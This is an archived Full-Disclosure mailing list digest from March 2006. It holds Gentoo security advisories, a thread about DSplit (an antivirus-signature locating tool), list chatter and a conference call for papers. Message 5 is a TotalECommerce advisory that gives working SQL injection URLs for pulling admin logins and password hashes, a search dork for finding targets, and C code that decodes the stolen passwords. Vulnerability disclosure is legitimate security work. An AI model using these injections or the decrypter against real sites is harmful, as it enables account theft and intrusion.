Full Disclosure mailing list archives
Re: Full-Disclosure Digest, Vol 13, Issue 8
From: "DONNY MCCOY" <DMCCOY () bbl-inc com>
Date: Sun, 05 Mar 2006 07:01:03 -0500
I will be in Denver through Thursday and will return to Syracuse on Friday. I will check voicemail and e-mail periodically as time allows. If your e-mail is urgent please contact the help desk in Syracuse at x19511. Thanks. Donny
full-disclosure 03/05/06 07:00 >>>
Send Full-Disclosure mailing list submissions to
full-disclosure () lists grok org uk
To subscribe or unsubscribe via the World Wide Web, visit
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
or, via email, send a message with subject or body 'help' to
full-disclosure-request () lists grok org uk
You can reach the person managing the list at
full-disclosure-owner () lists grok org uk
When replying, please edit your Subject line so it is more specific
than "Re: Contents of Full-Disclosure digest..."
Note to digest recipients - when replying to digest posts, please trim
your post appropriately. Thank you.
Today's Topics:
1. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
2. Re: DSplit - Tiny AV signatures Detector (ad () heapoverflow com)
3. Re: DSplit - Tiny AV signatures Detector (Alexander Hristov)
4. [ GLSA 200603-01 ] WordPress: SQL injection vulnerability
(Thierry Carrez)
5. Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability. (nukedx () nukedx com)
6. [ GLSA 200603-02 ] teTeX, pTeX, CSTeX: Multiple overflows in
included XPdf code (Thierry Carrez)
7. [ GLSA 200603-03 ] MPlayer: Multiple integer overflows
(Thierry Carrez)
8. Please remove me from the list (W1nd man)
9. Re: Please remove me from the list (Alexander Hristov)
10. (no subject) (Steven Rakick)
11. Re: (no subject) (Steven Rakick)
12. Re: (no subject) (PERFECT.MATERIAL)
13. HITBSecConf2006 - Malaysia: Call for Papers (Praburaajan)
----------------------------------------------------------------------
Message: 1
Date: Sat, 04 Mar 2006 13:09:57 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID: <44098395.6010604 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
yeah already knowing they are most fucking bastards
Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit is the small brother of an old tool known as UKsplitter wich is now abandonned, does not work in vmware, fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms and I'm not responsible of the bad uses of it, I recall this method is known since a long time and it's up to the AV firms to review their detections software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org usual critics , flames, can be directly sent to the Recycle Bin :>_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAmDlK+LRXunxpxfAQLmag/8D32IgYedMC/LKtfLKeNv/Dafq9i2NTKu
Hsns+6DpLvC5QlOUWUixfok2Nici4lp5dy/xF8D01tqgh3gKFnmv2u0dqjxj6w4K
VeZC2teXcYndCWrMDCX+3HFcT4+ZUjkMjGixAwnQhAuIsstQ5pP9pfOT+3PrZFeE
Li8IUqFzUL+sUkMhNeZm51mPF69nHeGTRYY9mKKploXeczCpH33EGjeMoDynwKwp
VPESww9avNd9AiCQ+bvE9Eeh1+kihcJwwyFfWqd64E4C3L85Cr+GqQ+EzQMp/ZmW
Bq4ETGD5En02DnHo8+S152VisipIKgWZpzlzgTlFTkyuDnh+aS5VH1ZJGoiMhONo
mNrDe45a3G2r6t3NA/PRJLocKrnrsXeGw7EqQ52GJ9sWrBXT+yJ/CbAZ6yg0ToVU
7zB8ggAsuedNKPCG3LZH/w5eDErFlG+c9pDzrvUv4NxR1BDRfPMlsSYcAR7zq9tf
q/I1fZO43hT3nSyukT8NNB1vN7S7J6Zw2Djh6jEjyPwefEnbFmd3Au1zF+tR6qX1
mkScSpoMgbJKcFkk8U2ZAskx18qHvkalKjnjbqxctigQ2sTf4FLtJlCwF5ux6Rld
Ko5Bs/yIdHr8b0l7r+v1Ek53P/BqtU+3QUC5y3maDSpK81VRlx3mI1Z3IWrrsUuA
KMruj3WAFys=
=+V3s
-----END PGP SIGNATURE-----
------------------------------
Message: 2
Date: Sat, 04 Mar 2006 13:16:33 +0100
From: "ad () heapoverflow com" <ad () heapoverflow com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: Alexander Hristov <joffer () gmail com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID: <44098521.6010509 () heapoverflow com>
Content-Type: text/plain; charset=ISO-8859-1
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
and it clearly shows clamav is a crap antivirus where the tools like
DSplit are a problem for them,
and they will detect DSplit when they can't find a better way to
detect virus.
Alexander Hristov wrote:
Clamav detects it and can unrar it with the unrar module On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit is the small brother of an old tool known as UKsplitter wich is now abandonned, does not work in vmware, fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms and I'm not responsible of the bad uses of it, I recall this method is known since a long time and it's up to the AV firms to review their detections software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org usual critics , flames, can be directly sent to the Recycle Bin :>_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX
OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0
gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq
GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H
DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m
uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG
59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac
2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx
9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h
TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb
rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH
RDdNjcudUuw=
=iAHW
-----END PGP SIGNATURE-----
------------------------------
Message: 3
Date: Sat, 4 Mar 2006 14:41:45 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] DSplit - Tiny AV signatures Detector
To: "ad () heapoverflow com" <ad () heapoverflow com>
Cc: Full Disclosure <full-disclosure () lists grok org uk>,
bugtraq () securityfocus com
Message-ID:
<734063a30603040441v3beb90d5n7faab639859c8dd7 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
Well clamav is the best AV for no money and its very good developed
again for no money :)
On 3/4/06, ad () heapoverflow com <ad () heapoverflow com> wrote:
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 and it clearly shows clamav is a crap antivirus where the tools like DSplit are a problem for them, and they will detect DSplit when they can't find a better way to detect virus. Alexander Hristov wrote:Clamav detects it and can unrar it with the unrar module On 3/3/06, ad () heapoverflow com <ad () heapoverflow com> wrote: DSplit is the small brother of an old tool known as UKsplitter wich is now abandonned, does not work in vmware, fails to run under windows 2003. DSplit has been coded for persons like me, targeted by AV firms and I'm not responsible of the bad uses of it, I recall this method is known since a long time and it's up to the AV firms to review their detections software.
http://heapoverflow.com/dem0s/Dsplit-patching_DFind_on_Symantec_Corporate.htm
http://getdsplit.class101.org usual critics , flames, can be directly sent to the Recycle Bin :>_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net >-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBRAmFIK+LRXunxpxfAQIfpw/+IRX6K3to4PGa9VDuJOyVjeOTofqLVAAX OcS1q1ECyzgrHotFSb9VzLLZHOiiPxZeUEbOici+rjG3av5LyYYrrzFumcOzHzt0 gzC9xZLyy6kIzBUjF5RExNNdurNPJOzEWLNCHbcLPT0yPh3IOtuSVfDJjZIV4ESq GRSeCtc0Hx6pGzamtnfUVzROma580CvV7SdpgWHpuopUdaIhzVjJOVtRwfXTaD2H DFI7tnBuKdsnG6XpsbQIuBEzlaT2y0iPX22qAukdgcsdJ5+1MK/LcICCKJbHmd1m uTCv/1arZEo+bc29lnMfqlyMSjNvlSe84/IA7trRZZZAnKpNULXtsrFKc8kMrGoG 59FBuUI7Mr+TEF5BB+gavxBSMZpe3hIMkggytXZTCt4jqfOCI/6OY9To5mPpkgac 2zoYVG7lDH90PTUgzoF0gcHPd4kbsxjiS2gSmRX050XnvT56i3IRZPE25cjA3iJx 9aLj41nmN3aHw2xAnIlbsXX9PkE5UZGL97ijifgfO7fW6Hf8TcdW3ZKIaFxM0+3h TBHXPpWLSXTretDER46S+e4w4nt6aaqDkna84Bcdo9UkCDIt1gfKMD2IKTTcUMWb rOBVh/YxBBrDayE7bkT/TEy697eTF3NZajCNDqyBqCKCQZOVCKICGPbYBUWI4kIH RDdNjcudUuw= =iAHW -----END PGP SIGNATURE-----
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net
------------------------------
Message: 4
Date: Sat, 04 Mar 2006 16:45:31 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-01 ] WordPress: SQL injection
vulnerability
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409B61B.5060903 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WordPress: SQL injection vulnerability
Date: March 04, 2006
Bugs: #121661
ID: 200603-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
WordPress is vulnerable to an SQL injection vulnerability.
Background
==========
WordPress is a PHP and MySQL based content management and publishing
system.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress <= 1.5.2 >= 2.0.1
Description
===========
Patrik Karlsson reported that WordPress 1.5.2 makes use of an
insufficiently filtered User Agent string in SQL queries related to
comments posting. This vulnerability was already fixed in the
2.0-series of WordPress.
Impact
======
An attacker could send a comment with a malicious User Agent parameter,
resulting in SQL injection and potentially in the subversion of the
WordPress database. This vulnerability wouldn't affect WordPress sites
which do not allow comments or which require that comments go through a
moderator.
Workaround
==========
Disable or moderate comments on your WordPress blogs.
Resolution
==========
All WordPress users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.1"
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-01.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/89aced5d/signature-0001.bin
------------------------------
Message: 5
Date: Sat, 04 Mar 2006 16:26:07 +0200
From: nukedx () nukedx com
Subject: [Full-disclosure] Advisory: TotalECommerce (index.asp id)
Remote SQL Injection Vulnerability.
To: submit () milw0rm com, full-disclosure () lists grok org uk,
bugtraq () securityfocus com
Message-ID: <20060304162607.2lyie75fm1m4gwow () webmail nukedx com>
Content-Type: text/plain; charset=ISO-8859-9
--Security Report--
Advisory: TotalECommerce (index.asp id) Remote SQL Injection
Vulnerability.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 04/03/06 04:36 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx () nukedx com
Web: http://www.nukedx.com
}
---
Vendor: TotalECommerce (http://www.totalecommerce.com)
Version: 1.0 and prior version must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries
to id
parameter
in index.asp
Level: Critical
---
How&Example:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,
senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 ->
http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,
login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,
login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and
with
example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
---
Timeline:
* 04/03/2006: Vulnerability found.
* 04/03/2006: Could not contact with vendor.
* 04/03/2006: File closed.
---
Exploit&Decrypter:
http://www.nukedx.com/?getxpl=18
---
Dorks: intext:"totalecommerce"
---
Original advisory: http://www.nukedx.com/?getxpl=18
---
Decrypter source in C
---
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
---End of code---
Greets to: |SaMaN|
------------------------------
Message: 6
Date: Sat, 04 Mar 2006 17:32:34 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-02 ] teTeX, pTeX, CSTeX:
Multiple overflows in included XPdf code
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409C122.4090103 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: teTeX, pTeX, CSTeX: Multiple overflows in included XPdf
code
Date: March 04, 2006
Bugs: #115775
ID: 200603-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
CSTeTeX, pTeX, and teTeX include vulnerable XPdf code to handle PDF
files, making them vulnerable to the execution of arbitrary code.
Background
==========
teTex is a complete TeX distribution. It is used for creating and
manipulating LaTeX documents. CSTeX is a TeX distribution with Czech
and Slovak support. pTeX is and ASCII publishing TeX distribution.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/tetex < 2.0.2-r8 >= 2.0.2-r8
2 app-text/cstetex < 2.0.2-r2 >= 2.0.2-r2
3 app-text/ptex < 3.1.5-r1 >= 3.1.5-r1
-------------------------------------------------------------------
3 affected packages on all of their supported architectures.
-------------------------------------------------------------------
Description
===========
CSTeX, teTex, and pTeX include XPdf code to handle PDF files. This XPdf
code is vulnerable to several heap overflows (GLSA 200512-08) as well
as several buffer and integer overflows discovered by Chris Evans
(CESA-2005-003).
Impact
======
An attacker could entice a user to open a specially crafted PDF file
with teTeX, pTeX or CSTeX, potentially resulting in the execution of
arbitrary code with the rights of the user running the affected
application.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All teTex users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/tetex-2.0.2-r8"
All CSTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/cstetex-2.0.2-r2"
All pTeX users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/ptex-3.1.5-r1"
References
==========
[ 1 ] CVE-2005-3193
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3193
[ 2 ] GLSA 200512-08
http://www.gentoo.org/security/en/glsa/glsa-200512-08.xml
[ 3 ] CESA-2005-003
http://scary.beasts.org/security/CESA-2005-003.txt
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-02.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/5e29724b/signature-0001.bin
------------------------------
Message: 7
Date: Sat, 04 Mar 2006 18:26:18 +0100
From: Thierry Carrez <koon () gentoo org>
Subject: [Full-disclosure] [ GLSA 200603-03 ] MPlayer: Multiple
integer overflows
To: gentoo-announce () lists gentoo org
Cc: full-disclosure () lists grok org uk, bugtraq () securityfocus com,
security-alerts () linuxsecurity com
Message-ID: <4409CDBA.8060405 () gentoo org>
Content-Type: text/plain; charset="iso-8859-1"
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: MPlayer: Multiple integer overflows
Date: March 04, 2006
Bugs: #115760, #122029
ID: 200603-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
MPlayer is vulnerable to integer overflows in FFmpeg and ASF decoding
that could potentially result in the execution of arbitrary code.
Background
==========
MPlayer is a media player capable of handling multiple multimedia file
formats.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-video/mplayer < 1.0.20060217 >= 1.0.20060217
Description
===========
MPlayer makes use of the FFmpeg library, which is vulnerable to a heap
overflow in the avcodec_default_get_buffer() function discovered by
Simon Kilvington (see GLSA 200601-06). Furthermore, AFI Security
Research discovered two integer overflows in ASF file format decoding,
in the new_demux_packet() function from libmpdemux/demuxer.h and the
demux_asf_read_packet() function from libmpdemux/demux_asf.c.
Impact
======
An attacker could craft a malicious media file which, when opened using
MPlayer, would lead to a heap-based buffer overflow. This could result
in the execution of arbitrary code with the permissions of the user
running MPlayer.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All MPlayer users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose
">=media-video/mplayer-1.0.20060217"
References
==========
[ 1 ] CVE-2005-4048
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4048
[ 2 ] CVE-2006-0579
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0579
[ 3 ] GLSA 200601-06
http://www.gentoo.org/security/en/glsa/glsa-200601-06.xml
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200603-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security () gentoo org or alternatively, you may file a bug at
http://bugs.gentoo.org.
License
=======
Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.0
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 256 bytes
Desc: OpenPGP digital signature
Url :
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/568fbea3/signature-0001.bin
------------------------------
Message: 8
Date: Sat, 4 Mar 2006 22:16:10 +0200
From: W1nd man <w1ndm4n () walla com>
Subject: [Full-disclosure] Please remove me from the list
To: <full-disclosure () lists grok org uk>
Message-ID: <1141503369.961000-13997465-23441 () walla com>
Content-Type: text/plain; charset="us-ascii"
An HTML attachment was scrubbed...
URL:
http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f69d9753/attachment-0001.html
------------------------------
Message: 9
Date: Sun, 5 Mar 2006 03:52:28 +0200
From: "Alexander Hristov" <joffer () gmail com>
Subject: Re: [Full-disclosure] Please remove me from the list
To: "W1nd man" <w1ndm4n () walla com>
Cc: full-disclosure () lists grok org uk
Message-ID:
<734063a30603041752v7a8cc6efnd28861cae0f8be32 () mail gmail com>
Content-Type: text/plain; charset=ISO-8859-1
U can remove yourself from here :
https://lists.grok.org.uk/mailman/listinfo/full-disclosure
On 3/4/06, W1nd man <w1ndm4n () walla com> wrote:
Please remove me from the list ________________________________ Walla! Mail - get your free 3G mail today _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- Best Regards, Aleksander Hristov < root at securitydot.net > < http://securitydot.net
------------------------------ Message: 10 Date: Sat, 4 Mar 2006 18:01:51 -0800 From: Steven Rakick <stevenrakick () yahoo com> Subject: [Full-disclosure] (no subject) To: full-disclosure () lists grok org uk Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net> Content-Type: text/plain; charset="iso-8859-1" Hello HACKERZ!, Your personal DONGEZ to this message. Sincerely, BanHaus manager -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060304/f1416faf/attachment-0001.html ------------------------------ Message: 11 Date: Sat, 4 Mar 2006 20:28:32 -0800 (PST) From: Steven Rakick <stevenrakick () yahoo com> Subject: Re: [Full-disclosure] (no subject) To: full-disclosure () lists grok org uk Message-ID: <20060305042832.34191.qmail () web53201 mail yahoo com> Content-Type: text/plain; charset=iso-8859-1 Not that it matters but... Received: from www.c0replay.net (unknown [206.251.72.74]) by lists.grok.org.uk (Postfix) with ESMTP id 739EF127 for <full-disclosure () lists grok org uk>; Sun, 5 Mar 2006 02:02:03 +0000 (GMT) Date: Sat, 4 Mar 2006 18:01:51 -0800 To: full-disclosure () lists grok org uk From: Steven Rakick <stevenrakick () yahoo com> Message-ID: <1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net> X-Priority: 3 X-Mailer: PHPMailer [version 1.73] __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ------------------------------ Message: 12 Date: Sun, 5 Mar 2006 00:34:03 -0500 From: PERFECT.MATERIAL <perfect.material () gmail com> Subject: Re: [Full-disclosure] (no subject) To: "Steven Rakick" <stevenrakick () yahoo com> Cc: full-disclosure () lists grok org uk Message-ID: <631ac1d90603042134n7a22e7aale14d2aa7914dda58 () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" Dick Breath, You should sign your electronic mail with some unhackable crypto technology. That way you will never need to show off your cut and paste technology to the others. You are irresponsible. Not that it matters but... PERFECT.MATERIAL On 3/4/06, Steven Rakick <stevenrakick () yahoo com> wrote:
Not that it matters but...
Received: from www.c0replay.net (unknown
[206.251.72.74])
by lists.grok.org.uk (Postfix) with ESMTP id 739EF127
for <full-disclosure () lists grok org uk>;
Sun, 5 Mar 2006 02:02:03 +0000 (GMT)
Date: Sat, 4 Mar 2006 18:01:51 -0800
To: full-disclosure () lists grok org uk
From: Steven Rakick <stevenrakick () yahoo com>
Message-ID:
<1e7e8bed62fc8c339e776bd2ef170a59 () www c0replay net>
X-Priority: 3
X-Mailer: PHPMailer [version 1.73]
__________________________________________________
Do You Yahoo!?
Tired of spam? Yahoo! Mail has the best spam protection around
http://mail.yahoo.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060305/d547fd1e/attachment-0001.html ------------------------------ Message: 13 Date: Sun, 05 Mar 2006 13:34:43 +0800 From: Praburaajan <prabu () hackinthebox org> Subject: [Full-disclosure] HITBSecConf2006 - Malaysia: Call for Papers To: full-disclosure () lists grok org uk, dailydave () lists immunitysec com, pen-test () securityfocus com, bugtraq () securityfocus com, Voipsec () voipsa org, submit () milw0rm com, webappsec () securityfocus com, ipv6 () ietf org, security-basics () securityfocus com Message-ID: <440A7873.4000202 () hackinthebox org> Content-Type: text/plain; charset=windows-1252; format=flowed Greetings from Hack in The Box -- We are pleased to announce that the Call for Paper (CfP) for HITBSecConf2006 - Malaysia is now open! Set to take place from September 18th - 21st 2006 at The Westin Kuala Lumpur, this years conference promises to once again deliver an International deep-knowledge security conference. HITBSecConf has been described as "the most intimate of hacker gatherings" and is the largest network security conference in Asia! SUBMISSION HITBSecConf is a deep-knowledge technical conference. Talks that are more technical or that discuss new and never before seen attack methods are of more interest than a subject that has been covered several times before. Summaries not exceeding 250 words should be submitted (in plain text format) to cfp -at- hackinthebox.org for review and possible inclusion in the programme. Submissions are due no later than 1st of May 2006 TOPICS Topics of interest include, but are not limited to the following: * Analysis of network and security vulnerabilities * Firewall technologies * Intrusion detection * Data Recovery and Incident Response * GPRS, 3G and CDMA Security * Identification and Entity Authentication * Network Protocol and Analysis * Smart Card Security * Virus and Worms * WLAN and Bluetooth Security. * Analysis of malicious code * Applications of cryptographic techniques, * Analysis of attacks against networks and machines * Denial-of-service attacks and countermeasures * File system security * Security in heterogeneous and large-scale environments * Techniques for developing secure systems PLEASE NOTE: We do not accept product or vendor related pitches. If your talk involves an advertisement for a new product or service your company is offering, please do not submit. Your submission should include: * Name, title, address, email and phone/contact number * Draft of the proposed presentation (in PDF or PowerPoint format), proof of concept for tools and exploits, etc. * Short biography, qualification, occupation, achievement and affiliations (limit 150 words). * Summary or abstract for your presentation (limit 250 words) * Time (45-60 minutes including time for discussion and questions) * Technical requirements (video, internet, wireless, audio, etc.) Each non-resident speaker will receive accommodation for 3 nights at The Westin Kuala Lumpur. For each non-resident speaker, HITB will cover travel expenses (through our airline partner, Malaysia Airlines) up to USD 1,000.00. HITBSecConf2006 CTF Daemons/Flags As part of our annual conference, HITB organizes an attack and defense "hack-game" commonly referred to as *Capture The Flag* or CTF. As part of our continued efforts to improve on the game and raise the bar each year, we are inviting speakers to contribute a daemon and exploit for this years CTF competition. For further details on the submission process, kindly e-mail dinesh -at- hackinthebox.org or ctfinfo -at- hackinthebox.org. On behalf of The HITB Team, we thank you and look forward to receiving your submissions! See you guys in September! HITBSecConf2006 - Malaysia: Deep-Knowledge Network Security http://conference.hackinthebox.org/hitbsecconf2006kl/ http://conference.hitb.org/hitbsecconf2006kl/ ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 13, Issue 8 ********************************************** _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
